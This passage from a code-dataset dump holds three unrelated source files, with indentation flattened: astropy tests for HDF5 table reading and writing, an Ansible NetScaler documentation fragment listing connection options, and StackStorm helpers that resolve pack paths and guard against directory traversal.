t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(test_file, path='the_table')
import h5py
with h5py.File(test_file, 'r') as input_file:
t2 = Table.read(input_file, path='the_table')
assert np.all(t2['a'] == [1, 2, 3])
@pytest.mark.skipif('not HAS_H5PY')
def test_read_filobj_path(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(test_file, path='path/to/data/the_table')
import h5py
with h5py.File(test_file, 'r') as input_file:
t2 = Table.read(input_file, path='path/to/data/the_table')
assert np.all(t2['a'] == [1, 2, 3])
@pytest.mark.skipif('not HAS_H5PY')
def test_read_filobj_group_path(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(test_file, path='path/to/data/the_table')
import h5py
with h5py.File(test_file, 'r') as input_file:
t2 = Table.read(input_file['path/to'], path='data/the_table')
assert np.all(t2['a'] == [1, 2, 3])
@pytest.mark.skipif('not HAS_H5PY')
def test_read_wrong_fileobj():
class FakeFile:
def read(self):
pass
f = FakeFile()
with pytest.raises(TypeError, match='h5py can only open regular files'):
Table.read(f, format='hdf5')
@pytest.mark.skipif('not HAS_H5PY')
def test_write_fileobj(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
import h5py
with h5py.File(test_file, 'w') as output_file:
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(output_file, path='the_table')
t2 = Table.read(test_file, path='the_table')
assert np.all(t2['a'] == [1, 2, 3])
@pytest.mark.skipif('not HAS_H5PY')
def test_write_create_dataset_kwargs(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
the_path = 'the_table'
import h5py
with h5py.File(test_file, 'w') as output_file:
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(output_file, path=the_path,
maxshape=(None, ))
# A roundabout way of checking this, but the table created above should be
# resizable if the kwarg was passed through successfully
t2 = Table()
t2.add_column(Column(name='a', data=[4, 5]))
with h5py.File(test_file, 'a') as output_file:
output_file[the_path].resize((len(t1) + len(t2), ))
output_file[the_path][len(t1):] = t2.as_array()
t3 = Table.read(test_file, path='the_table')
assert np.all(t3['a'] == [1, 2, 3, 4, 5])
@pytest.mark.skipif('not HAS_H5PY')
def test_write_filobj_group(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
import h5py
with h5py.File(test_file, 'w') as output_file:
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(output_file, path='path/to/data/the_table')
t2 = Table.read(test_file, path='path/to/data/the_table')
assert np.all(t2['a'] == [1, 2, 3])
@pytest.mark.skipif('not HAS_H5PY')
def test_write_wrong_type():
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
with pytest.raises(TypeError) as exc:
t1.write(1212, path='path/to/data/the_table', format='hdf5')
assert exc.value.args[0] == ('output should be a string '
'or an h5py File or Group object')
@pytest.mark.skipif('not HAS_H5PY')
@pytest.mark.parametrize(('dtype'), ALL_DTYPES)
def test_preserve_single_dtypes(tmpdir, dtype):
test_file = str(tmpdir.join('test.hdf5'))
values = _default_values(dtype)
t1 = Table()
t1.add_column(Column(name='a', data=np.array(values, dtype=dtype)))
t1.write(test_file, path='the_table')
t2 = Table.read(test_file, path='the_table')
assert np.all(t2['a'] == values)
assert t2['a'].dtype == dtype
@pytest.mark.skipif('not HAS_H5PY')
def test_preserve_all_dtypes(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
for dtype in ALL_DTYPES:
values = _default_values(dtype)
t1.add_column(Column(name=str(dtype), data=np.array(values, dtype=dtype)))
t1.write(test_file, path='the_table')
t2 = Table.read(test_file, path='the_table')
for dtype in ALL_DTYPES:
values = _default_values(dtype)
assert np.all(t2[str(dtype)] == values)
assert t2[str(dtype)].dtype == dtype
@pytest.mark.skipif('not HAS_H5PY')
def test_preserve_meta(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.meta['a'] = 1
t1.meta['b'] = 'hello'
t1.meta['c'] = 3.14159
t1.meta['d'] = True
t1.meta['e'] = np.array([1, 2, 3])
t1.write(test_file, path='the_table')
t2 = Table.read(test_file, path='the_table')
for key in t1.meta:
assert np.all(t1.meta[key] == t2.meta[key])
@pytest.mark.skipif('not HAS_H5PY')
def test_preserve_serialized(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1['a'] = Column(data=[1, 2, 3], unit="s")
t1['a'].meta['a0'] = "A0"
t1['a'].meta['a1'] = {"a1": [0, 1]}
t1['a'].format = '7.3f'
t1['a'].description = 'A column'
t1.meta['b'] = 1
t1.meta['c'] = {"c0": [0, 1]}
t1.write(test_file, path='the_table', serialize_meta=True, overwrite=True)
t2 = Table.read(test_file, path='the_table')
assert t1['a'].unit == t2['a'].unit
assert t1['a'].format == t2['a'].format
assert t1['a'].description == t2['a'].description
assert t1['a'].meta == t2['a'].meta
assert t1.meta == t2.meta
# Check that the meta table is fixed-width bytes (see #11299)
h5 = h5py.File(test_file, 'r')
meta_lines = h5[meta_path('the_table')]
assert meta_lines.dtype.kind == 'S'
@pytest.mark.skipif('not HAS_H5PY')
def test_preserve_serialized_old_meta_format(tmpdir):
"""Test the old meta format
Only for some files created prior to v4.0, in compatibility mode.
"""
test_file = get_pkg_data_filename('data/old_meta_example.hdf5')
t1 = Table()
t1['a'] = Column(data=[1, 2, 3], unit="s")
t1['a'].meta['a0'] = "A0"
t1['a'].meta['a1'] = {"a1": [0, 1]}
t1['a'].format = '7.3f'
t1['a'].description = 'A column'
t1.meta['b'] = 1
t1.meta['c'] = {"c0": [0, 1]}
t2 = Table.read(test_file, path='the_table')
assert t1['a'].unit == t2['a'].unit
assert t1['a'].format == t2['a'].format
assert t1['a'].description == t2['a'].description
assert t1['a'].meta == t2['a'].meta
assert t1.meta == t2.meta
@pytest.mark.skipif('not HAS_H5PY')
def test_preserve_serialized_in_complicated_path(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1['a'] = Column(data=[1, 2, 3], unit="s")
t1['a'].meta['a0'] = "A0"
t1['a'].meta['a1'] = {"a1": [0, 1]}
t1['a'].format = '7.3f'
t1['a'].description = 'A column'
t1.meta['b'] = 1
t1.meta['c'] = {"c0": [0, 1]}
t1.write(test_file, path='the_table/complicated/path', serialize_meta=True,
overwrite=True)
t2 = Table.read(test_file, path='the_table/complicated/path')
assert t1['a'].format == t2['a'].format
assert t1['a'].unit == t2['a'].unit
assert t1['a'].description == t2['a'].description
assert t1['a'].meta == t2['a'].meta
assert t1.meta == t2.meta
@pytest.mark.skipif('not HAS_H5PY')
def test_metadata_very_large(tmpdir):
"""Test that very large datasets work, now!"""
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1['a'] = Column(data=[1, 2, 3], unit="s")
t1['a'].meta['a0'] = "A0"
t1['a'].meta['a1'] = {"a1": [0, 1]}
t1['a'].format = '7.3f'
t1['a'].description = 'A column'
t1.meta['b'] = 1
t1.meta['c'] = {"c0": [0, 1]}
t1.meta["meta_big"] = "0" * (2 ** 16 + 1)
t1.meta["meta_biggerstill"] = "0" * (2 ** 18)
t1.write(test_file, path='the_table', serialize_meta=True, overwrite=True)
t2 = Table.read(test_file, path='the_table')
assert t1['a'].unit == t2['a'].unit
assert t1['a'].format == t2['a'].format
assert t1['a'].description == t2['a'].description
assert t1['a'].meta == t2['a'].meta
assert t1.meta == t2.meta
@pytest.mark.skipif('not HAS_H5PY')
def test_skip_meta(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.meta['a'] = 1
t1.meta['b'] = 'hello'
t1.meta['c'] = 3.14159
t1.meta['d'] = True
t1.meta['e'] = np.array([1, 2, 3])
t1.meta['f'] = str
wtext = f"Attribute `f` of type {type(t1.meta['f'])} cannot be written to HDF5 files - skipping"
with pytest.warns(AstropyUserWarning, match=wtext) as w:
t1.write(test_file, path='the_table')
assert len(w) == 1
@pytest.mark.skipif('not HAS_H5PY')
def test_fail_meta_serialize(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.meta['f'] = str
with pytest.raises(Exception) as err:
t1.write(test_file, path='the_table', serialize_meta=True)
assert "cannot represent an object" in str(err.value)
assert "<class 'str'>" in str(err.value)
@pytest.mark.skipif('not HAS_H5PY')
def test_read_h5py_objects(tmpdir):
# Regression test - ensure that Datasets are recognized automatically
test_file = str(tmpdir.join('test.hdf5'))
import h5py
with h5py.File(test_file, 'w') as output_file:
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(output_file, path='the_table')
f = h5py.File(test_file, mode='r')
t2 = Table.read(f, path='the_table')
assert np.all(t2['a'] == [1, 2, 3])
t3 = Table.read(f['/'], path='the_table')
assert np.all(t3['a'] == [1, 2, 3])
t4 = Table.read(f['the_table'])
assert np.all(t4['a'] == [1, 2, 3])
f.close() # don't raise an error in 'test --open-files'
@pytest.mark.skipif('not HAS_H5PY')
def test_read_write_unicode_to_hdf5(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t = Table()
t['p'] = ['a', 'b', 'c']
t['q'] = [1, 2, 3]
t['r'] = [b'a', b'b', b'c']
t['s'] = ["\u2119", "\u01b4", "\u2602"]
t.write(test_file, path='the_table', overwrite=True)
t1 = Table.read(test_file, path='the_table', character_as_bytes=False)
for col, col1 in zip(t.itercols(), t1.itercols()):
assert np.all(col == col1)
assert np.all(t1['p'].info.dtype.kind == "U")
assert np.all(t1['q'].info.dtype.kind == "i")
assert np.all(t1['r'].info.dtype.kind == "U")
assert np.all(t1['s'].info.dtype.kind == "U")
# Test default (character_as_bytes=True)
t2 = Table.read(test_file, path='the_table')
for col, col1 in zip(t.itercols(), t2.itercols()):
assert np.all(col == col1)
assert np.all(t2['p'].info.dtype.kind == "S")
assert np.all(t2['q'].info.dtype.kind == "i")
assert np.all(t2['r'].info.dtype.kind == "S")
assert np.all(t2['s'].info.dtype.kind == "S")
def assert_objects_equal(obj1, obj2, attrs, compare_class=True):
if compare_class:
assert obj1.__class__ is obj2.__class__
info_attrs = ['info.name', 'info.format', 'info.unit', 'info.description', 'info.meta']
for attr in attrs + info_attrs:
a1 = obj1
a2 = obj2
for subattr in attr.split('.'):
try:
a1 = getattr(a1, subattr)
a2 = getattr(a2, subattr)
except AttributeError:
a1 = a1[subattr]
a2 = a2[subattr]
# Mixin info.meta can be None instead of an empty OrderedDict(); #6720 would fix this.
if attr == 'info.meta':
if a1 is None:
a1 = {}
if a2 is None:
a2 = {}
if isinstance(a1, np.ndarray) and a1.dtype.kind == 'f':
assert quantity_allclose(a1, a2, rtol=1e-15)
else:
assert np.all(a1 == a2)
# Testing HDF5 table read/write with mixins. This is mostly
# copied from FITS mixin testing, and it might be good to unify it.
# Analogous tests also exist for ECSV.
el = EarthLocation(x=1 * u.km, y=3 * u.km, z=5 * u.km)
el2 = EarthLocation(x=[1, 2] * u.km, y=[3, 4] * u.km, z=[5, 6] * u.km)
sr = SphericalRepresentation(
[0, 1]*u.deg, [2, 3]*u.deg, 1*u.kpc)
cr = CartesianRepresentation(
[0, 1]*u.pc, [4, 5]*u.pc, [8, 6]*u.pc)
sd = SphericalCosLatDifferential(
[0, 1]*u.mas/u.yr, [0, 1]*u.mas/u.yr, 10*u.km/u.s)
srd = SphericalRepresentation(sr, differentials=sd)
sc = SkyCoord([1, 2], [3, 4], unit='deg,deg', frame='fk4',
obstime='J1990.5')
scd = SkyCoord([1, 2], [3, 4], [5, 6], unit='deg,deg,m', frame='fk4',
obstime=['J1990.5', 'J1991.5'])
scdc = scd.copy()
scdc.representation_type = 'cartesian'
scpm = SkyCoord([1, 2], [3, 4], [5, 6], unit='deg,deg,pc',
pm_ra_cosdec=[7, 8]*u.mas/u.yr, pm_dec=[9, 10]*u.mas/u.yr)
scpmrv = SkyCoord([1, 2], [3, 4], [5, 6], unit='deg,deg,pc',
pm_ra_cosdec=[7, 8]*u.mas/u.yr, pm_dec=[9, 10]*u.mas/u.yr,
radial_velocity=[11, 12]*u.km/u.s)
scrv = SkyCoord([1, 2], [3, 4], [5, 6], unit='deg,deg,pc',
radial_velocity=[11, 12]*u.km/u.s)
tm = Time([2450814.5, 2450815.5], format='jd', scale='tai', location=el)
# NOTE: in the test below the name of the column "x" for the Quantity is
# important since it tests the fix for #10215 (namespace clash, where "x"
# clashes with "el2.x").
mixin_cols = {
'tm': tm,
'dt': TimeDelta([1, 2] * u.day),
'sc': sc,
'scd': scd,
'scdc': scdc,
'scpm': scpm,
'scpmrv': scpmrv,
'scrv': scrv,
'x': [1, 2] * u.m,
'qdb': [10, 20] * u.dB(u.mW),
'qdex': [4.5, 5.5] * u.dex(u.cm/u.s**2),
'qmag': [21, 22] * u.ABmag,
'lat': Latitude([1, 2] * u.deg),
'lon': Longitude([1, 2] * u.deg, wrap_angle=180. * u.deg),
'ang': Angle([1, 2] * u.deg),
'el2': el2,
'sr': sr,
'cr': cr,
'sd': sd,
'srd': srd,
}
time_attrs = ['value', 'shape', 'format', 'scale', 'location']
compare_attrs = {
'c1': ['data'],
'c2': ['data'],
'tm': time_attrs,
'dt': ['shape', 'value', 'format', 'scale'],
'sc': ['ra', 'dec', 'representation_type', 'frame.name'],
'scd': ['ra', 'dec', 'distance', 'representation_type', 'frame.name'],
'scdc': ['x', 'y', 'z', 'representation_type', 'frame.name'],
'scpm': ['ra', 'dec', 'distance', 'pm_ra_cosdec', 'pm_dec',
'representation_type', 'frame.name'],
'scpmrv': ['ra', 'dec', 'distance', 'pm_ra_cosdec', 'pm_dec',
'radial_velocity', 'representation_type', 'frame.name'],
'scrv': ['ra', 'dec', 'distance', 'radial_velocity', 'representation_type',
'frame.name'],
'x': ['value', 'unit'],
'qdb': ['value', 'unit'],
'qdex': ['value', 'unit'],
'qmag': ['value', 'unit'],
'lon': ['value', 'unit', 'wrap_angle'],
'lat': ['value', 'unit'],
'ang': ['value', 'unit'],
'el2': ['x', 'y', 'z', 'ellipsoid'],
'nd': ['x', 'y', 'z'],
'sr': ['lon', 'lat', 'distance'],
'cr': ['x', 'y', 'z'],
'sd': ['d_lon_coslat', 'd_lat', 'd_distance'],
'srd': ['lon', 'lat', 'distance', 'differentials.s.d_lon_coslat',
'differentials.s.d_lat', 'differentials.s.d_distance'],
}
@pytest.mark.skipif('not HAS_H5PY')
def test_hdf5_mixins_qtable_to_table(tmpdir):
"""Test writing as QTable and reading as Table. Ensure correct classes
come out.
"""
filename = str(tmpdir.join('test_simple.hdf5'))
names = sorted(mixin_cols)
t = QTable([mixin_cols[name] for name in names], names=names)
t.write(filename, format='hdf5', path='root', serialize_meta=True)
t2 = Table.read(filename, format='hdf5', path='root')
assert t.colnames == t2.colnames
for name, col in t.columns.items():
col2 = t2[name]
# Special-case Time, which does not yet support round-tripping
# the format.
if isinstance(col2, Time):
col2.format = col.format
attrs = compare_attrs[name]
compare_class = True
if isinstance(col.info, QuantityInfo):
# Downgrade Quantity to Column + unit
assert type(col2) is Column
# Class-specific attributes like `value` or `wrap_angle` are lost.
attrs = ['unit']
compare_class = False
# Compare data values here (assert_objects_equal doesn't know how in this case)
assert np.all(col.value == col2)
assert_objects_equal(col, col2, attrs, compare_class)
@pytest.mark.skipif('not HAS_H5PY')
@pytest.mark.parametrize('table_cls', (Table, QTable))
def test_hdf5_mixins_as_one(table_cls, tmpdir):
"""Test write/read all cols at once and validate intermediate column names"""
filename = str(tmpdir.join('test_simple.hdf5'))
names = sorted(mixin_cols)
serialized_names = ['ang',
'cr.x', 'cr.y', 'cr.z',
'dt.jd1', 'dt.jd2',
'el2.x', 'el2.y', 'el2.z',
'lat',
'lon',
'qdb',
'qdex',
'qmag',
'sc.ra', 'sc.dec',
'scd.ra', 'scd.dec', 'scd.distance',
'scd.obstime.jd1', 'scd.obstime.jd2',
'scdc.x', 'scdc.y', 'scdc.z',
'scdc.obstime.jd1', 'scdc.obstime.jd2',
'scpm.ra', 'scpm.dec', 'scpm.distance',
'scpm.pm_ra_cosdec', 'scpm.pm_dec',
'scpmrv.ra', 'scpmrv.dec', 'scpmrv.distance',
'scpmrv.pm_ra_cosdec', 'scpmrv.pm_dec',
'scpmrv.radial_velocity',
'scrv.ra', 'scrv.dec', 'scrv.distance',
'scrv.radial_velocity',
'sd.d_lon_coslat', 'sd.d_lat', 'sd.d_distance',
'sr.lon', 'sr.lat', 'sr.distance',
'srd.lon', 'srd.lat', 'srd.distance',
'srd.differentials.s.d_lon_coslat',
'srd.differentials.s.d_lat',
'srd.differentials.s.d_distance',
'tm.jd1', 'tm.jd2',
'x',
]
t = table_cls([mixin_cols[name] for name in names], names=names)
t.meta['C'] = 'spam'
t.meta['comments'] = ['this', 'is', 'a', 'comment']
t.meta['history'] = ['first', 'second', 'third']
t.write(filename, format="hdf5", path='root', serialize_meta=True)
t2 = table_cls.read(filename, format='hdf5', path='root')
assert t2.meta['C'] == 'spam'
assert t2.meta['comments'] == ['this', 'is', 'a', 'comment']
assert t2.meta['history'] == ['first', 'second', 'third']
assert t.colnames == t2.colnames
# Read directly via hdf5 and confirm column names
h5 = h5py.File(filename, 'r')
assert list(h5['root'].dtype.names) == serialized_names
h5.close()
@pytest.mark.skipif('not HAS_H5PY')
@pytest.mark.parametrize('name_col', list(mixin_cols.items()))
@pytest.mark.parametrize('table_cls', (Table, QTable))
def test_hdf5_mixins_per_column(table_cls, name_col, tmpdir):
"""Test write/read one col at a time and do detailed validation"""
filename = str(tmpdir.join('test_simple.hdf5'))
name, col = name_col
c = [1.0, 2.0]
t = table_cls([c, col, c], names=['c1', name, 'c2'])
t[name].info.description = 'my description'
t[name].info.meta = {'list': list(range(50)), 'dict': {'a': 'b' * 200}}
if not t.has_mixin_columns:
pytest.skip('column is not a mixin (e.g. Quantity subclass in Table)')
if isinstance(t[name], NdarrayMixin):
pytest.xfail('NdarrayMixin not supported')
t.write(filename, format="hdf5", path='root', serialize_meta=True)
t2 = table_cls.read(filename, format='hdf5', path='root')
assert t.colnames == t2.colnames
for colname in t.colnames:
assert_objects_equal(t[colname], t2[colname], compare_attrs[colname])
# Special case to make sure Column type doesn't leak into Time class data
if name.startswith('tm'):
assert t2[name]._time.jd1.__class__ is np.ndarray
assert t2[name]._time.jd2.__class__ is np.ndarray
@pytest.mark.skipif('not HAS_H5PY')
def test_round_trip_masked_table_default(tmpdir):
"""Test round-trip of MaskedColumn through HDF5 using default serialization
that writes a separate mask column. Note:
>>> simple_table(masked=True)
<Table masked=True length=3>
a b c
int64 float64 str1
----- ------- ----
-- 1.0 c
2 2.0 --
3 -- e
"""
filename = str(tmpdir.join('test.h5'))
t = simple_table(masked=True) # int, float, and str cols with one masked element
t['c'] = [b'c', b'd', b'e']
t['c'].mask[1] = True
t.write(filename, format='hdf5', path='root', serialize_meta=True)
t2 = Table.read(filename)
assert t2.masked is False
assert t2.colnames == t.colnames
for name in t2.colnames:
assert np.all(t2[name].mask == t[name].mask)
assert np.all(t2[name] == t[name])
# Data under the mask round-trips also (unmask data to show this).
t[name].mask = False
t2[name].mask = False
assert np.all(t2[name] == t[name])
@pytest.mark.skipif('not HAS_H5PY')
def test_overwrite_serialized_meta():
# This used to cause an error because the meta data table
# was not removed from the existing file.
with h5py.File('test_data.h5', 'w', driver='core', backing_store=False) as out:
t1 = Table()
t1.add_column(Column(data=[4, 8, 15], unit='cm'))
t1.write(out, path='data', serialize_meta=True)
t2 = Table.read(out, path='data')
assert all(t1 == t2)
assert t1.info(out=None) == t2.info(out=None)
t3 = Table()
t3.add_column(Column(data=[16, 23, 42], unit='g'))
t3.write(out, path='data', serialize_meta=True, append=True, overwrite=True)
t2 = Table.read(out, path='data')
assert all(t3 == t2)
assert t3.info(out=None) == t2.info(out=None)
| bsd-3-clause |
orgito/ansible | lib/ansible/utils/module_docs_fragments/netscaler.py | 13 | 2011 | class ModuleDocFragment(object):
DOCUMENTATION = '''
options:
nsip:
description:
- The ip address of the netscaler appliance where the nitro API calls will be made.
- "The port can be specified with the colon (:). E.g. 192.168.1.1:555."
required: True
nitro_user:
description:
- The username with which to authenticate to the netscaler node.
required: True
nitro_pass:
description:
- The password with which to authenticate to the netscaler node.
required: True
nitro_protocol:
choices: [ 'http', 'https' ]
default: http
description:
- Which protocol to use when accessing the nitro API objects.
validate_certs:
description:
- If C(no), SSL certificates will not be validated. This should only be used on personally controlled sites using self-signed certificates.
required: false
default: 'yes'
type: bool
nitro_timeout:
description:
- Time in seconds until a timeout error is thrown when establishing a new session with the netscaler node.
default: 310
state:
choices: ['present', 'absent']
default: 'present'
description:
- The state of the resource being configured by the module on the netscaler node.
- When present the resource will be created if needed and configured according to the module's parameters.
- When absent the resource will be deleted from the netscaler node.
save_config:
description:
- If true the module will save the configuration on the netscaler node if it makes any changes.
- The module will not save the configuration on the netscaler node if it made no changes.
type: bool
default: true
notes:
- For more information on using Ansible to manage Citrix NetScaler Network devices see U(https://www.ansible.com/ansible-netscaler).
'''
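# Hedged usage sketch, not part of the original fragment: a playbook task for a
# module that extends this documentation fragment might set the shared connection
# options as below; the module name ``netscaler_server`` and all values are
# illustrative assumptions only.
#
#   - name: Ensure server object exists
#     netscaler_server:
#       nsip: 192.168.1.1:555          # port supplied with a colon, as documented above
#       nitro_user: nsroot
#       nitro_pass: "{{ nitro_password }}"
#       nitro_protocol: https
#       validate_certs: no
#       state: present
#       save_config: yes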
| gpl-3.0 |
dennybaa/st2 | st2common/st2common/content/utils.py | 5 | 10089 | # Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import os.path
from oslo_config import cfg
from st2common.constants.action import LIBS_DIR as ACTION_LIBS_DIR
from st2common.util.types import OrderedSet
from st2common.util.shell import quote_unix
__all__ = [
'get_system_packs_base_path',
'get_packs_base_paths',
'get_pack_base_path',
'get_pack_directory',
'get_pack_file_abs_path',
'get_pack_resource_file_abs_path',
'get_relative_path_to_pack',
'check_pack_directory_exists',
'check_pack_content_directory_exists'
]
def get_system_packs_base_path():
"""
Return a path to the directory where system packs are stored.
:rtype: ``str``
"""
return cfg.CONF.content.system_packs_base_path
def get_packs_base_paths():
"""
Return a list of base paths which are searched for integration packs.
:rtype: ``list``
"""
system_packs_base_path = get_system_packs_base_path()
packs_base_paths = cfg.CONF.content.packs_base_paths or ''
# Remove trailing colon (if present)
if packs_base_paths.endswith(':'):
packs_base_paths = packs_base_paths[:-1]
result = []
# System path is always first
if system_packs_base_path:
result.append(system_packs_base_path)
packs_base_paths = packs_base_paths.split(':')
result = result + packs_base_paths
result = [path for path in result if path]
result = list(OrderedSet(result))
return result
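# Hedged illustration, not part of the original module: it assumes the st2 content
# config options are already registered so that overrides can be applied.
def _example_packs_base_paths_ordering():
    """Show the ordering rules of get_packs_base_paths() on sample values.

    The system packs path always comes first, a trailing colon is stripped,
    empty entries are dropped and duplicates are removed while preserving order.
    """
    cfg.CONF.set_override('system_packs_base_path', '/usr/share/st2/packs',
                          group='content')
    cfg.CONF.set_override('packs_base_paths', '/opt/packs:/usr/share/st2/packs:',
                          group='content')
    assert get_packs_base_paths() == ['/usr/share/st2/packs', '/opt/packs']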
def check_pack_directory_exists(pack):
"""
Check if a provided pack exists in one of the pack paths.
:param pack: Pack name.
:type pack: ``str``
:rtype: ``bool``
"""
packs_base_paths = get_packs_base_paths()
for base_dir in packs_base_paths:
pack_path = os.path.join(base_dir, pack)
if os.path.exists(pack_path):
return True
return False
def check_pack_content_directory_exists(pack, content_type):
"""
Check if the provided content type directory (e.g. actions, sensors, rules) exists inside the pack in one of the pack paths.
:param pack: Pack name.
:type pack: ``str``
:param content_type: Content type (actions, sensors, rules).
:type content_type: ``str``
:rtype: ``bool``
"""
packs_base_paths = get_packs_base_paths()
for base_dir in packs_base_paths:
pack_content_pack = os.path.join(base_dir, pack, content_type)
if os.path.exists(pack_content_pack):
return True
return False
def get_pack_base_path(pack_name):
"""
Return full absolute base path to the content pack directory.
Note: This function looks for the pack in all the load paths and returns the path to the
first pack which matches the provided name.
If the pack is not found, a path pointing into the first packs directory is returned (this
is here for backward compatibility reasons).
:param pack_name: Content pack name.
:type pack_name: ``str``
:rtype: ``str``
"""
if not pack_name:
return None
packs_base_paths = get_packs_base_paths()
for packs_base_path in packs_base_paths:
pack_base_path = os.path.join(packs_base_path, quote_unix(pack_name))
pack_base_path = os.path.abspath(pack_base_path)
if os.path.isdir(pack_base_path):
return pack_base_path
# Path with the provided name not found
pack_base_path = os.path.join(packs_base_paths[0], quote_unix(pack_name))
pack_base_path = os.path.abspath(pack_base_path)
return pack_base_path
def get_pack_directory(pack_name):
"""
Retrieve a directory for the provided pack.
If a directory for the provided pack doesn't exist in any of the search paths, None
is returned instead.
Note: If the same pack exists in multiple search paths, the path to the first one is returned.
:param pack_name: Pack name.
:type pack_name: ``str``
:return: Path to the pack directory.
:rtype: ``str`` or ``None``
"""
packs_base_paths = get_packs_base_paths()
for packs_base_path in packs_base_paths:
pack_base_path = os.path.join(packs_base_path, quote_unix(pack_name))
pack_base_path = os.path.abspath(pack_base_path)
if os.path.isdir(pack_base_path):
return pack_base_path
return None
def get_entry_point_abs_path(pack=None, entry_point=None):
"""
Return full absolute path of an action entry point in a pack.
:param pack: Content pack name.
:type pack: ``str``
:param entry_point: Action entry point.
:type entry_point: ``str``
:rtype: ``str``
"""
if not entry_point:
return None
if os.path.isabs(entry_point):
pack_base_path = get_pack_base_path(pack_name=pack)
common_prefix = os.path.commonprefix([pack_base_path, entry_point])
if common_prefix != pack_base_path:
raise ValueError('Entry point file "%s" is located outside of the pack directory' %
(entry_point))
return entry_point
entry_point_abs_path = get_pack_resource_file_abs_path(pack_name=pack,
resource_type='action',
file_path=entry_point)
return entry_point_abs_path
def get_pack_file_abs_path(pack_name, file_path):
"""
Retrieve full absolute path to the pack file.
Note: This function also takes care of sanitizing the ``file_path`` argument,
preventing directory traversal and similar attacks.
:param pack_name: Pack name.
:type pack_name: ``str``
:param file_path: Resource file path relative to the pack directory (e.g. my_file.py or
actions/directory/my_file.py)
:type file_path: ``str``
:rtype: ``str``
"""
pack_base_path = get_pack_base_path(pack_name=pack_name)
path_components = []
path_components.append(pack_base_path)
# Normalize the path to prevent directory traversal
normalized_file_path = os.path.normpath('/' + file_path).lstrip('/')
if normalized_file_path != file_path:
raise ValueError('Invalid file path: %s' % (file_path))
path_components.append(normalized_file_path)
result = os.path.join(*path_components)
assert normalized_file_path in result
# Final safety check for common prefix to avoid traversal attack
common_prefix = os.path.commonprefix([pack_base_path, result])
if common_prefix != pack_base_path:
raise ValueError('Invalid file_path: %s' % (file_path))
return result
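# Hedged illustration, not part of the original module: it assumes the st2 content
# config is registered; the pack name 'examples' and file names are illustrative.
def _example_pack_file_abs_path_sanitization():
    """Show how get_pack_file_abs_path() resolves and sanitizes paths."""
    # A well-formed relative path resolves under the pack directory.
    path = get_pack_file_abs_path(pack_name='examples',
                                  file_path='actions/my_action.py')
    assert path.endswith('examples/actions/my_action.py')
    # A path which tries to escape the pack directory is rejected.
    try:
        get_pack_file_abs_path(pack_name='examples', file_path='../../etc/passwd')
    except ValueError:
        pass  # directory traversal attempts raise ValueError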
def get_pack_resource_file_abs_path(pack_name, resource_type, file_path):
"""
Retrieve full absolute path to the pack resource file.
Note: This function also takes care of sanitizing the ``file_path`` argument,
preventing directory traversal and similar attacks.
:param pack_name: Pack name.
:type pack_name: ``str``
:param resource_type: Pack resource type (e.g. action, sensor, etc.).
:type resource_type: ``str``
:param file_path: Resource file path relative to the pack directory (e.g. my_file.py or
directory/my_file.py)
:type file_path: ``str``
:rtype: ``str``
"""
path_components = []
if resource_type == 'action':
path_components.append('actions/')
elif resource_type == 'sensor':
path_components.append('sensors/')
elif resource_type == 'rule':
path_components.append('rules/')
else:
raise ValueError('Invalid resource type: %s' % (resource_type))
path_components.append(file_path)
file_path = os.path.join(*path_components)
result = get_pack_file_abs_path(pack_name=pack_name, file_path=file_path)
return result
def get_relative_path_to_pack(pack_name, file_path):
"""
Retrieve a file path which is relative to the provided pack directory.
:rtype: ``str``
"""
pack_base_path = get_pack_base_path(pack_name=pack_name)
if not os.path.isabs(file_path):
return file_path
common_prefix = os.path.commonprefix([pack_base_path, file_path])
if common_prefix != pack_base_path:
raise ValueError('file_path is not located inside the pack directory')
relative_path = os.path.relpath(file_path, common_prefix)
return relative_path
def get_action_libs_abs_path(pack=None, entry_point=None):
"""
Return full absolute path of libs for an action.
:param pack: Content pack name.
:type pack: ``str``
:param entry_point: Action entry point.
:type entry_point: ``str``
:rtype: ``str``
"""
entry_point_abs_path = get_entry_point_abs_path(pack=pack, entry_point=entry_point)
if entry_point_abs_path is not None:
return os.path.join(os.path.dirname(entry_point_abs_path), ACTION_LIBS_DIR)
else:
return None
def get_aliases_base_paths():
"""
Return a list of base paths which are searched for action aliases.
:rtype: ``list``
"""
aliases_base_paths = cfg.CONF.content.aliases_base_paths or ''
# Remove trailing colon (if present)
if aliases_base_paths.endswith(':'):
aliases_base_paths = aliases_base_paths[:-1]
result = []
aliases_base_paths = aliases_base_paths.split(':')
